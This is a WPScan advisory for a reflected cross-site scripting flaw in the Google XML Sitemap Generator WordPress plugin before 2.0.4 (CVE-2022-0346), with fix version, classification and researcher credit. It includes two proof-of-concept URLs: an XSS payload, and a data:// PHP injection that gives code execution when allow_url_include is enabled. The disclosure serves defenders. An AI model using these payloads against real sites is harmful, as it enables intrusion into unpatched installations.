WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting

Description

The plugin does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.

Proof of Concept

XSS: https://example.com/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(1)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp
RCE (when allow_url_include is on):  https://example.com/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp

Affects Plugins

www-xml-sitemap-generator-org
Fixed in version 2.0.4

References

CVE
CVE-2022-0346

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
4b339390-d71a-44e0-8682-51a12bd2bfe6

Timeline

Publicly Published

2022-05-02 (about 10 months ago)

Added

2022-05-02 (about 10 months ago)

Last Updated

2022-05-02 (about 10 months ago)

Our Other Services

WPScan WordPress Security Plugin